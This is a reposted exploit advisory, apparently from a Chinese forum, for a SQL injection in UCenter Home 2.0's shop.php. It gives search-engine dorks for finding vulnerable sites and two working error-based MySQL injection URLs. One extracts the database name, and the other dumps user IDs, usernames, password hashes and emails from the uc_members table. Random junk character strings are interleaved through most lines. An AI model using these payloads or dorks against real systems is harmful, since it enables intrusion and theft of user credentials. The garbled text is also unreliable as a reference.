$ ~6 F* v. Z, g' A% B! `( D__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__ 4 K0 U9 }# d! I$ r8 j
1 z5 U) J+ K* F' |
8 v7 O' c: [" E# x
1 w( q( Z+ e4 P, I0 L2 F( x
*/ Author : KnocKout 1 k$ i/ ^, X* f7 u$ G& f' W; G
/ g; J+ e: Q* K, C" v1 q5 F, j
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
; h; t2 g" S4 B4 r0 A+ z* y
6 H' u, p( H7 c% Y3 J }/ H* v*/ Contact: knockoutr@msn.com ' n8 E* F* S) f- s- A
8 d- P# X8 H2 B ^
*/ Cyber-Warrior.org/CWKnocKout ) b( }$ @ ~. `) K. V1 W% c- x
# [0 A7 x7 \. l1 t__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
& D. \: E9 ^& g/ s: }6 X1 V) x/ S& B; I5 g
Script : UCenter Home
1 z. d* z. h! L/ r% ?- {3 F3 Q* p, S, f8 p& f" o
Version : 2.0
- K" Q* Q# \7 ?8 [4 {6 |" Z* u( P4 C7 [* W! X- C0 j
Script HomePage : http://u.discuz.net/ 1 Q/ P# u& A+ E
- @: f, z- B& r; a% o" f__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
: M0 v' r$ j K/ I2 B
& D. m% E* W1 ], ?Dork : Powered by UCenter inurl:shop.php?ac=view
* A9 F# _2 p* t" L" c' P8 F! \: m0 e* D2 o' g: p
Dork 2 : inurl:shop.php?ac=view&shopid=
. z4 {: y3 m p) t, k; s5 r& e" b: |- S0 X; G4 C
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
5 [( k5 o' G, Q/ n% ~5 L5 Z( G& D" d4 ]
Vuln file : Shop.php 7 i" ^0 d+ H. i, A3 `- [9 }" g6 t. t% _
- z/ ?4 J# M$ Avalue's : (?)ac=view&shopid= - u$ J) `/ V r! N. o/ ?
2 c( H0 G4 Z9 o2 |Vulnerable Style : SQL Injection (MySQL Error Based)
5 y$ w) J. _- Y1 d) p/ s d& I- M7 z7 o9 H( N1 A {) Y* ] g
Need Metarials : Hex Conversion % D* g/ s7 T3 K. D7 ~' z2 `
I, \/ X1 ]& {5 Y2 G, J
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
8 n6 l* `$ K; T2 _- U
2 K, `) z& T u* q3 Q; GYour Need victim Database name.
# c; f- ~# v) B: z/ y
+ U+ M2 `9 I5 s9 N0 L) e* \+ Bfor Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
2 O* [& f" `; x8 W
: `- g8 R/ e1 d1 C..
9 j& b* Z9 k) p5 A# b! y! l9 G/ ^! k$ S5 x( v; F6 U5 R
DB : Okey. 6 m. p' Y8 w, n6 N* \7 v
" |( N. ~2 N# T3 V4 ^
your edit DB `[TARGET DB NAME]` ! }3 _, Z% j/ F* q) T; h& \
5 c1 x5 F$ D* |. f+ q! e
Example : 'hiwir1_ucenter'
7 }9 Y9 }- ]) x' `$ c; D/ Y* {/ G# b/ h& a; o+ x
Edit : Okey.
' w# R$ F0 L1 H$ Y% B k0 V7 y P; C# l. G0 I0 [; L* a' {5 M9 t j. J
Your use Hex conversion. And edit Your SQL Injection Exploit.. 4 J) D+ @% ] j, }& [: H* }
/ E5 v5 D5 i1 l- F; a$ J/ P) \) [- b
* b: P& P; O5 D$ j& m8 B9 h" o2 W4 o3 S5 H& }7 ?/ s
Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
" e# s2 C2 d$ l2 P* ] |
发表于 2013-2-27 21:31:31
收藏
支持
反对